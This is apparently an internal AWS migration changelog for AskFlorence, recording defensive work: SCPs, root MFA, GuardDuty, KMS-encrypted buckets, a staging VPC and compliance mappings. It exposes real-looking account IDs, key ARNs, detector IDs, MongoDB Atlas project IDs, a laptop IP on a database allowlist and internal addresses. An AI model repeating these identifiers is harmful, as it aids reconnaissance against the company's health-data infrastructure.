  • MAIL FROM subdomain mail.staging.askflorence.health
  • 3 DKIM tokens generated (RSA 2048-bit), 3 CNAMEs required at Cloudflare
  • Status: PENDING (requires 3 DKIM CNAMEs + MAIL FROM MX + SPF TXT + DMARC TXT at Cloudflare)
  • DMARC policy: p=none (monitor only — prod will tighten to quarantine or reject)

Module library at infra/modules/ ​

This Phase created the reusable Terraform module library that Phase 8 (prod mirror) will consume:

  • network/ — VPC + subnets + IGW + NAT (configurable HA) + route tables + SG + S3 Gateway endpoint + configurable interface endpoints (single or multi-AZ) + flow logs
  • kms/ — CMK + alias + rotation, extensible policy
  • secrets/ — Secrets Manager shells with lifecycle.ignore_changes on value (value lives out-of-band)
  • acm/ — Cert with DNS validation + output for Cloudflare records
  • ses/ — Email identity + MAIL FROM + DKIM + DMARC output for Cloudflare records

Phase 8 prod config will call the same modules with different inputs (e.g., nat_ha=true, interface_endpoint_multi_az=true, vpc_cidr="10.20.0.0/16", DMARC p=quarantine).

Vercel prod impact ​

Zero. All 55 resources live exclusively in the AWS staging account (549136075525). No Vercel env changes, no app code changes, no MongoDB changes. Vercel prod continues serving askflorence.health exactly as before.

Compliance implications ​

  • SOC 2 CC6.1 (Logical Access) + CC7.1 (Infrastructure Management): staging is now a separate network + IAM + encryption boundary from prod, managed via IaC.
  • SOC 2 CC6.7 (transmission): TLS-only policies already in place (tfstate bucket + KMS default + forthcoming ALB); staging workloads inherit.
  • HIPAA §164.312(a)(2)(iv) (encryption at rest): staging CMK rotation enabled; all Secrets Manager secrets SSE-KMS-encrypted with the CMK.
  • HIPAA §164.312(e)(2)(ii) (transmission encryption): SES identity + DMARC/SPF/DKIM setup ensures authenticated email delivery; transmission to SES is TLS-inherent.
  • EDE Phase 3 / NIST 800-53 AU family: VPC Flow Logs capturing all traffic, retained 7 days in staging (prod will retain longer); CloudTrail already org-wide from Phase 2.
  • Data classification enforcement: every Secrets Manager shell tagged with DataClass per the plan's architectural principle. Future IAM policies can use aws:ResourceTag/DataClass conditions to grant access based on classification.

Taha next action (parallel / unblocks Phase 5) ​

Add 7 DNS records to Cloudflare DNS (DNS-only, no proxy) per phase-4-staging-dns-records.md:

  • 1 CNAME for ACM cert validation
  • 3 CNAMEs for SES DKIM
  • 1 MX + 1 TXT for SES MAIL FROM subdomain
  • 1 TXT for DMARC

After records propagate (~5-30 min), ACM transitions to ISSUED and SES to verified; Phase 5 can attach the cert to the ALB and start sending via SES.

Pending follow-up ​

  • Phase 5 ECS task role grants secretsmanager:GetSecretValue on the 13 secret ARNs and kms:Decrypt on the CMK for encrypted secret reads.
  • Phase 5 task role also grants ses:SendEmail / ses:SendRawEmail once SES identity is verified.
  • Phase 7 Atlas VPC peering updates the staging Atlas project with this VPC CIDR (10.40.0.0/16), removes Taha's laptop IP from the allowlist.

Cost estimate (pre-workload) ​

  • NAT Gateway: ~$33/mo
  • Interface endpoints (3 × single-AZ): ~$21/mo
  • CMK: $1/mo
  • Secrets Manager: ~$5/mo (13 secrets × $0.40)
  • ACM + SES identity: $0 (free tier)
  • Flow Logs (CloudWatch Logs 7d): ~$1/mo at idle
  • Total pre-workload: ~$61/mo

Will grow once ECS + ALB land in Phase 5.


2026-04-21T03:00Z — Phase 2.5: close chrome-agent Phase 2 verification gaps ​

Actor: taha.abbasi via SSO AdministratorAccess (mgmt + log-archive delegated admin) Linked: Issue #47, plan file ~/.claude/plans/hey-so-okay-that-delightful-eich.md (Phase 2.5 section)

Why ​

Chrome agent Phase 2 console verification was green on 5 of 6 checks but surfaced two specific fixable gaps + one not-yet-unblocked Taha action:

  1. GuardDuty feature plans (S3 data events, EBS malware, Runtime monitoring) showed "Do not auto-enable" on existing detectors. Root cause: my Phase 2 update-organization-configuration call used AutoEnable=NEW which only applies to future member accounts added to the org after the call — it does NOT retroactively push features to existing member detectors.
  2. GuardDuty console banner in log-archive: delegated admin lacks Organizations trusted access for Malware Protection. Blocks any cross-account feature push involving EBS malware.
  3. Budgets UI blocked for AdministratorAccess SSO on mgmt (Taha-only root-toggle follow-up — deferred, tracked below).

What shipped (2.5.2 — GuardDuty features retroactively enabled on all 4 detectors) ​

  • Enabled Organizations trusted access for malware-protection.guardduty.amazonaws.com from mgmt account. This was the prerequisite that unlocked the member-detector update path.
  • From log-archive (delegated admin), ran aws guardduty update-member-detectors against 778477254880 + 039624954211 + 549136075525 with features:
    • S3_DATA_EVENTS = ENABLED
    • EBS_MALWARE_PROTECTION = ENABLED
    • RUNTIME_MONITORING = ENABLED with ECS_FARGATE_AGENT_MANAGEMENT = ENABLED
  • Log-archive's own detector already had these enabled from Phase 2 direct update-detector calls.
  • Verified via get-detector on each of 4 detector IDs:
    • mgmt 9a71698300b24e55a21a53c4d8f660a9
    • prod 92cecfac97e0e00d20f77b575e742163
    • staging b6cecfac97da41f247f4f0e5de0e1b99
    • log-archive 44396c0b61674ade87312ff13ab85996

What shipped (2.5.3 — Malware Protection for S3) ​

  • New custom IAM role GuardDutyMalwareProtectionS3Role in mgmt (arn ending ...KMPVPMJZJ) with trust malware-protection-plan.guardduty.amazonaws.com + aws:SourceAccount == 778477254880. Scan permissions scoped strictly to the agent-survey-uploads/ prefix. Also kms:GenerateDataKey/Decrypt/DescribeKey on alias/askflorence-data so SSE-KMS objects can be scanned.
  • Malware Protection plan d4ced6e0c14fe707c26d created on askflorence-data bucket, prefix agent-survey-uploads/, Tagging action ENABLED. Status: ACTIVE.
  • End-to-end smoke test: uploaded a 295-byte blank PDF via /api/agents/discovery/upload, polled s3api get-object-tagging, scan tag GuardDutyMalwareScanStatus=NO_THREATS_FOUND applied within ~60 seconds. Test object cleaned up.

Intentional scope exclusions (documented for audit trail) ​

  • Cross-account EBS Malware Protection grant (separate from the EBS_MALWARE_PROTECTION feature above). Skipped because we're Fargate-only with zero EBS volumes to scan. Deliberate scope limit, documented in guardduty-setup.md.
  • EKS / RDS / Lambda / EC2-agent features in GuardDuty. Services we don't run.
  • Security Hub Central configuration migration (noted by chrome agent). Deferred to Phase 3 or Phase 12 — cleaner to migrate once Terraform is managing Security Hub.

Deferred to Taha (2.5.1) ​

  • Enable IAM user/role access to billing information on mgmt account root. Requires root login (can't be done from SSO). Navigate to console top-right account menu → Account → "IAM User and Role Access to Billing Information" → Edit → Activate. Doesn't change any permissions; just lets existing policies take effect on the Billing Console.
  • After toggle: verify aws --profile askflorence budgets describe-budgets --account-id 778477254880 returns 5 budgets (was blocked at the IAM-billing-access layer before).

Compliance implications ​

  • SOC 2 CC7.2 (Change Detection) + CC7.3 (Anomaly Detection): every account now has S3 data event detection, Fargate runtime monitoring, and EBS malware detection where applicable. Coverage is consistent across the org.
  • HIPAA §164.308(a)(1)(ii)(D) (Information System Activity Review): agent PDF uploads are scanned pre-persistence tag; malware findings route to GuardDuty console (and eventually EventBridge in Phase 11).
  • CMS EDE Phase 3: Malware Protection for S3 is defense-in-depth on the PHI-capable bucket. The intentional scope limits (no EKS/RDS/EC2 features) are documented so auditors see deliberate decisions, not gaps.

Pending follow-up ​

  • Taha flips the billing access toggle (2.5.1) whenever convenient — no urgency.
  • Phase 3 Terraform will tf-import the new IAM role GuardDutyMalwareProtectionS3Role, Malware Protection plan, and the retroactive detector feature state so everything becomes IaC.
  • Phase 11: EventBridge rule to forward GuardDutyMalwareScanStatus=THREATS_FOUND tags to alerting.

2026-04-21T02:00Z — askflorence-data bucket hardened per agent-survey-uploads runbook ​

Actor: taha.abbasi via SSO AdministratorAccess in management account 778477254880 Linked: Issue #47, Issue #56, commit 07fd8aa, docs/runbooks/s3-agent-survey-uploads.md

Why ​

Commit 07fd8aa shipped /api/agents/discovery/upload which writes blank-template PDFs (potentially PHI-adjacent per the runbook's PHI-confirmation gate) into s3://askflorence-data/agent-survey-uploads/. The bucket was only partially hardened at that commit — public access blocked and SSE-S3 encryption only, no versioning, no deny-non-SSL policy, no lifecycle rules, no customer-managed CMK. Closing that gap now as an AWS migration intake task before Phase 3 Terraform scaffolding (otherwise we'd be importing an unhardened bucket into IaC).

What changed ​

KMS CMK created in management account (778477254880):

  • Alias: alias/askflorence-data
  • ARN: arn:aws:kms:us-east-1:778477254880:key/88df2ce4-b694-4181-91b1-d0efc107429a
  • Key policy: mgmt root IAM + s3.amazonaws.com service-principal GenerateDataKey/Decrypt/DescribeKey
  • Annual auto-rotation enabled
  • Tags: Env=management, Owner=askflorence, ManagedBy=cli-phase2, DataClass=pii-phi

Bucket askflorence-data:

  • Versioning: Enabled (was: off)
  • Default encryption: SSE-KMS with alias/askflorence-data, BucketKeyEnabled=true (was: SSE-S3 AES256)
  • Bucket policy added: DenyNonSSLRequests (denies all S3 actions if aws:SecureTransport == false)
  • Lifecycle rules added:
    • AgentSurveyUploadsLifecycle (prefix agent-survey-uploads/): abort incomplete multipart uploads after 1 day, transition to Glacier Instant Retrieval after 180 days, expire non-current versions after 90 days.
    • AbortStalledMultipartUploadsGlobal (no prefix): abort incomplete multipart uploads after 7 days.
  • Tags added: same as CMK
  • Object Lock: intentionally not enabled. Compliance-mode Object Lock can't retrofit a bucket that wasn't created with it; per the runbook, this is deferred to Phase 4-5 where a new bucket with Object Lock enabled-at-creation will be stood up and data migrated. Tracked as a follow-up on #47.

IAM user vercel-agent-survey-uploader (created by Taha 2026-04-20 to back the upload route):

  • Inline policy PutAgentSurveyUploads extended with:
    • kms:GenerateDataKey, kms:Encrypt, kms:DescribeKey on the new CMK ARN (required now that bucket default is SSE-KMS).
  • Existing s3:PutObject on askflorence-data/agent-survey-uploads/* unchanged.

Vercel env (production + preview):

  • Added S3_AGENT_SURVEY_KMS_KEY_ID = the new CMK ARN. Upload route in src/app/api/agents/discovery/upload/route.ts picks this up at line 119 and emits explicit ServerSideEncryption: aws:kms + SSEKMSKeyId: <arn> on each PutObject. Without this env var the route would fall back to SSE-S3 AES256 (which still works because we have no bucket policy forcing aws:kms, but loses the CMK audit trail).
  • Vercel redeploy (vercel --prod) required to pick up the env change.

Compliance implications ​

  • HIPAA §164.312(a)(2)(iv) (encryption at rest): upgraded from SSE-S3 (AWS-managed) to SSE-KMS with customer-managed CMK. Audit trail for encryption operations now lands in CloudTrail via KMS data events (if enabled on the CMK — currently not; flag for Phase 4 to enable KMS data events on this key).
  • HIPAA §164.312(e)(2)(ii) (encryption in transit): deny-non-SSL bucket policy enforces TLS for all access.
  • SOC 2 CC6.7 (transmission restrictions): same.
  • Data retention: lifecycle rules document retention intent (180d hot, Glacier IR after that, non-current expires at 90d). Partial PHI deletion procedure already documented in runbook.
  • PHI-capable bucket in management account, not in a dedicated HIPAA-scoped account. Architectural debt noted: Phase 4 moves PHI-capable buckets into the prod member account (039624954211) where CloudTrail + Config + GuardDuty already scope per-account and SCPs tighten the blast radius.

Also followed ​

  • Runbook docs/runbooks/s3-agent-survey-uploads.md step 3 updated with the real CMK ARN (was <CMK-ID> placeholder).

Pending follow-up ​

  • vercel --prod redeploy so the app picks up S3_AGENT_SURVEY_KMS_KEY_ID. Taha's call when to trigger; no urgency since SSE-S3 fallback still works.
  • Phase 4-5: decision + execution on migrating to an Object Lock-enabled replacement bucket.
  • Phase 4: enable KMS data events on this CMK in CloudTrail (per-CMK granular audit trail).

2026-04-18T01:00Z — Phase 2 complete: org-wide observability baseline ​

Actor: taha.abbasi via SSO AdministratorAccess (mgmt + each member as delegated admin) Linked: Issue #47

What shipped ​

2a — Log-archive foundations (all in 754660694122):

  • KMS CMK alias/askflorence-org-logs (arn:aws:kms:us-east-1:754660694122:key/e9dfcdbe-19e1-491c-a8f9-d17612cf6353) with annual auto-rotation, policy allowing CloudTrail + Config service encrypt and org-wide decrypt.
  • S3 bucket askflorence-org-cloudtrail-logs-754660694122 — object-lock COMPLIANCE 7yr, versioning, SSE-KMS, public access blocked, deny-non-SSL, CloudTrail write + deny-unencrypted-puts.
  • S3 bucket askflorence-org-config-754660694122 — SSE-KMS, versioning, public access blocked, deny-non-SSL, org-wide Config write.

2b — Trusted access + delegations + org trail:

  • Enabled trusted access for 9 services (cloudtrail, config, config-multiaccountsetup, guardduty, securityhub, access-analyzer, stacksets, ram, ssm).
  • Delegated admin to log-archive (754660694122) for: guardduty, securityhub, config, config-multiaccountsetup, access-analyzer.
  • askflorence-org-trail in mgmt — multi-region, org-wide, global events on, log file validation, SSE-KMS, CloudWatch Logs export (365d), Insights (ApiCallRate + ApiErrorRate).

2c — GuardDuty + Security Hub + Config:

  • GuardDuty: org-wide auto-enroll ALL. Delegated admin detector 44396c0b61674ade87312ff13ab85996 in log-archive + self-managed detector 9a71698300b24e55a21a53c4d8f660a9 in mgmt. Features: S3 data events, EBS malware protection, Runtime monitoring (ECS Fargate).
  • Security Hub: delegated admin = log-archive. Finding aggregator ALL_REGIONS→us-east-1. Standards: FSBP + CIS 1.2 (default) everywhere; CIS v3.0.0 on prod + staging; NIST 800-53 Rev 5 on prod (HIPAA-aligned).
  • Config: recorder + delivery channel in all 4 accounts, customer-managed AskFlorenceConfigRole per account, snapshots to askflorence-org-config-754660694122. Org-wide aggregator askflorence-org-aggregator in log-archive.

2d — Drata autopilot role stubs:

  • DrataAutopilotRole created in all 4 accounts. Policies pre-attached (SecurityAudit + ReadOnlyAccess + DrataAutopilotExtras inline). Trust policy is a placeholder pointing to mgmt root with ExternalId PLACEHOLDER-REPLACE-ON-DRATA-ONBOARD. When Drata is activated (Phase 12 / later), swap trust policy to Drata's official autopilot account ARN + their issued ExternalId — no further policy work needed.

2e — Documentation landed:

  • NEW: cloudtrail-setup.md
  • NEW: guardduty-setup.md
  • NEW: security-hub-setup.md
  • NEW: config-setup.md

Verification ​

  • aws cloudtrail get-trail-status --name askflorence-org-trail → IsLogging true.
  • aws guardduty describe-organization-configuration --detector-id 44396c0b61674ade87312ff13ab85996 → AutoEnableOrganizationMembers = ALL.
  • aws securityhub describe-organization-configuration → AutoEnable true, AutoEnableStandards DEFAULT.
  • aws configservice describe-configuration-recorder-status (each account) → recording=true.
  • aws configservice describe-configuration-aggregators (log-archive) → askflorence-org-aggregator present.

SOC 2 / HIPAA / EDE relevance ​

  • SOC 2 CC7.1 (Infrastructure Management) + CC7.2 (Change Detection): CloudTrail org trail, Config recorders, GuardDuty on day one — this is the continuous-operating-evidence auditors look for.
  • HIPAA §164.308(a)(1)(ii)(D) (Information System Activity Review): CloudTrail + GuardDuty satisfy the audit-trail requirement for systems handling PHI (once PHI workloads land in Phase 5+).
  • CMS EDE Phase 3: auditors will ask for 6-12 months of audit trail and threat detection history. Clock starts now.
  • Drata readiness: read-only role stubs in all 4 accounts means Drata onboarding later is a trust-policy swap, not a fresh IAM setup.

Pending follow-up ​

  • Expected: Security Hub controls will transition from PENDING to PASSED/FAILED over ~30-60 min. Review initial findings, document any expected failures (resources that don't exist yet pre-Phase 4).
  • Future (Phase 8): apply HIPAA conformance pack to prod Config from log-archive delegated admin.
  • Future (Phase 11): EventBridge rule to forward CRITICAL findings to alerting destination.

2026-04-18T00:45Z — Root MFA registered on all 3 new member accounts ​

Actor: taha.abbasi via root user of each member account Linked: Issue #47

What shipped ​

Root user on each of the 3 new member accounts now has:

  • Password set via the AWS sign-in forgot-password flow (email delivered to aws@askflorence.health via plus-addressing).
  • Virtual MFA device registered (see iam:mfa/* ARN on each account's Security Credentials page).
  • Root session signed out after MFA setup.
AccountAccount IDRoot emailMFA
askflorence-prod039624954211aws+prod@askflorence.healthVirtual, registered 2026-04-18
askflorence-staging549136075525aws+staging@askflorence.healthVirtual, registered 2026-04-18
askflorence-log-archive754660694122aws+log-archive@askflorence.healthVirtual, registered 2026-04-18

SOC 2 / HIPAA / EDE relevance ​

  • SOC 2 CC6.1 (Logical Access) and CC6.2 (Credentials) — MFA required on privileged identities.
  • HIPAA §164.312(d) (Person or Entity Authentication) — multi-factor present on all root users.
  • Management-account root MFA already in place (pre-migration).
  • Zero root access keys on any of the 3 new accounts (confirmed during bootstrap — Organizations-created accounts don't get them by default).

Day-to-day path is SSO AdministratorAccess / PowerUserAccess — root is sealed.


2026-04-18T00:30Z — SCP ScpBaseline v2: carve out root-bootstrap actions ​

Actor: taha.abbasi via SSO AdministratorAccess in management account 778477254880 Linked: Issue #47

Why ​

Phase 1 v1 of ScpBaseline (p-oy7xxdzz) had a blanket DenyRootUser rule that denied all actions when principal matched arn:aws:iam::*:root. This blocked root from performing the one-time bootstrap actions AWS requires for new member accounts (setting up MFA, changing password, listing access keys). Evidence: Taha saw Access denied to iam:ListMFADevices on root of 039624954211 with SCP p-oy7xxdzz cited in the error.

What changed ​

Replaced DenyRootUser with DenyRootExceptBootstrap — uses NotAction + Deny so root can only perform an allow-list of bootstrap actions, and is denied everything else. Allow-list:

  • iam:CreateVirtualMFADevice, DeleteVirtualMFADevice, EnableMFADevice, DeactivateMFADevice, ResyncMFADevice, ListMFADevices, ListVirtualMFADevices, GetMFADevice
  • iam:ChangePassword, UpdateLoginProfile, GetLoginProfile
  • iam:GetAccountSummary, GetUser, ListAccessKeys, DeleteAccessKey, GetAccountPasswordPolicy, ListAccountAliases
  • sts:GetCallerIdentity, GetSessionToken
  • signin:*, aws-portal:*, account:*, health:*, support:*, supportplans:*, trustedadvisor:*

All other root actions remain denied. The rest of the SCP (region-lock, deny-leave-org, protect-CloudTrail/Config/GuardDuty/SecurityHub) is unchanged.

Verification ​

  • aws organizations describe-policy --policy-id p-oy7xxdzz shows v2 content live.
  • Taha confirmed IAM Security Credentials page on 039624954211 now lists MFA devices after refresh.

Rollback ​

If a root action we didn't anticipate gets blocked, extend the allow-list (one PR) or temporarily detach the SCP (aws organizations detach-policy --policy-id p-oy7xxdzz --target-id <ou>) for the affected OU while debugging.

SOC 2 / HIPAA / EDE relevance ​

This tightens SOC 2 CC6.1 (Logical Access) — least-privilege enforcement on the highest-privilege identity (root). Aligns with AWS Well-Architected Security Pillar guidance "use root only for bootstrap tasks."


2026-04-18T00:25Z — AWS Organizations BAA accepted (org-wide) ​

Actor: taha.abbasi via root user of management account 778477254880, AWS Artifact → Organization agreements Linked: Issue #47, Issue #57

What shipped ​

  • Accepted AWS Organizations Business Associate Addendum via AWS Artifact Organization agreements tab. Effective date: April 18, 2026. Status: Active.
  • BAA applies to: management account (778477254880) plus all current + future member accounts in organization o-vefew8kgv1. Covers askflorence-prod (039624954211), askflorence-staging (549136075525), and askflorence-log-archive (754660694122).
  • Signed PDF filed at: docs/infrastructure/evidence/aws-organizations-baa-signed-2026-04-18.pdf.
  • Coverage scope per BAA text: PHI is permitted to be processed only on HIPAA-eligible AWS services, encrypted in-transit and at-rest, under AWS Customer Agreement terms.

Compliance implications ​

  • SOC 2 CC1.4, HIPAA §164.314(a), CMS EDE Phase 3 — vendor-BAA evidence requirement for AWS satisfied at the infrastructure level.
  • Cross-links #57 (vendor BAA audit) — AWS row can be marked complete with reference to this evidence.
  • Remaining BAA work on #57 (owned by Asad): MongoDB Atlas, Resend, Cloudflare (DNS-only so not strictly required but good hygiene), PostHog, and future NIPR + ID-verification vendors.

2026-04-18T00:15Z — Mongo/Atlas parallel session handoff received ​

Actor: parallel Mongo/Atlas session agent Linked: Issue #56, session brief at SESSION_BRIEF_2026-04-17_atlas.md

The Mongo session provisioned the staging Atlas cluster per the handoff instructions in the AWS migration plan. Both hard corrections applied (separate Atlas project, no mirrored allowlist).

Facts the AWS session will consume at Phase 4 and Phase 7 ​

  • Atlas org ID: 69dc20c64005b222804daf75
  • Staging Atlas project: askflorence-staging → 69e31af12fd2c0aef51bbb41 (isolated from prod project 69dc20c64005b222804dafa4)
  • Staging cluster: askflorence-staging.efsikmv.mongodb.net — M0 free tier, us-east-1, MongoDB 8.0.21
  • Seed: snapshot from prod askflorence-prod-01, 35,056 docs, 231 MB (no PII/PHI)
  • Allowlist: 136.38.212.186/32 (Taha's laptop) only. No 0.0.0.0/0.
  • Users: 6 on staging (app_read_staging, app_writer_survey, app_writer_plans, app_writer_agents, app_admin_agents, audit_reader). Connection strings in .env.staging.local (gitignored, mode 600).
  • Prod Atlas project untouched: 69dc20c64005b222804dafa4. Narrow-scoped users roll out to prod in a later session post-cutover.

AWS follow-ups from this handoff ​

  • Phase 4: copy 6 staging Atlas URIs from .env.staging.local into AWS Secrets Manager under staging/mongodb/* in the staging account (549136075525).
  • Phase 7: create VPC peering from staging VPC (10.40.0.0/16) to Atlas staging project 69e31af12fd2c0aef51bbb41, then replace the laptop IP allowlist entry with the VPC CIDR.
  • Phase 8/11: same peering flow for the prod Atlas project 69dc20c64005b222804dafa4 ↔ AWS prod VPC (10.20.0.0/16).

2026-04-18T00:00Z — Phase 1 complete: AWS Organizations + accounts + SSO + SCPs + budgets ​

Actor: taha.abbasi via SSO AdministratorAccess in account 778477254880 Linked: Issue #47, migration plan at ~/.claude/plans/hey-so-okay-that-delightful-eich.mdSession: AWS migration agent (parallel to Mongo/Atlas session on #56)

Changes ​

  1. OUs created under root r-9qla:

    • Prod — ou-9qla-8z7htmau
    • Non-Prod — ou-9qla-o6snxwss
    • Security — ou-9qla-c5psmqcy
  2. Member accounts created (Organizations async):

    • askflorence-prod — 039624954211 — aws+prod@askflorence.health → Prod OU
    • askflorence-staging — 549136075525 — aws+staging@askflorence.health → Non-Prod OU
    • askflorence-log-archive — 754660694122 — aws+log-archive@askflorence.health → Security OU
  3. IAM Identity Center permission sets created:

    • PowerUserAccess (PT4H) → managed policy PowerUserAccess
    • BillingReadOnly (PT4H) → managed policy job-function/Billing
    • SecurityAudit (PT4H) → managed policies SecurityAudit + ReadOnlyAccess
    • (existing) AdministratorAccess (PT1H) untouched
  4. SSO assignments: Taha assigned AdministratorAccess + PowerUserAccess on each of the 3 new accounts.

  5. SCP ScpBaseline created (p-oy7xxdzz) and attached to Prod, Non-Prod, Security OUs:

    • Deny root user actions on member accounts.
    • Deny organizations:LeaveOrganization.
    • Deny disabling CloudTrail / Config / GuardDuty / Security Hub.
    • Region lock to us-east-1 (global services and service-linked roles exempted).
  6. Budgets (all on management account 778477254880, filtered by LinkedAccount):

    • askflorence-prod-monthly: $200/mo
    • askflorence-staging-monthly: $100/mo
    • askflorence-log-archive-monthly: $50/mo
    • askflorence-org-total-monthly: $500/mo
    • All with 80% actual + 100% forecast alerts to taha@askflorence.health.
  7. ~/.aws/config on Taha's dev machine updated with profiles for each new account (AdminAccess + PowerUser on prod/staging, AdminAccess only on log-archive).

Verification ​

  • aws --profile askflorence-prod sts get-caller-identity returns a valid AWSReservedSSO_AdministratorAccess_* assumed-role in 039624954211 ✓
  • Same for askflorence-staging (549136075525) and askflorence-log-archive (754660694122) ✓
  • aws organizations list-accounts-for-parent shows each account in its correct OU ✓
  • aws organizations list-policies-for-target shows ScpBaseline attached to all 3 workload OUs ✓
  • aws budgets describe-budgets shows 5 budgets (4 new + 1 legacy) ✓

Rollback ​

All Phase 1 changes are fully reversible but account closure has a 90-day SUSPENDED waiting period at AWS's end. No reason to roll back — all changes are additive and do not affect the live Vercel site.

Pending follow-up ​

  • AWS BAA signing in Artifact console (manual, must be done in-browser by Taha).
  • Root credentials + MFA setup on all 3 member accounts (one-time, Taha only).
  • Seal root credentials in password vault + hardware MFA in physical safe.

Pager
Previous pagePhase 4 DNS
Next pageVulnerability Management

AskFlorence Internal Documentation. Not for public distribution.

AskFlorence

Internal Documentation

Access restricted. Not for public distribution.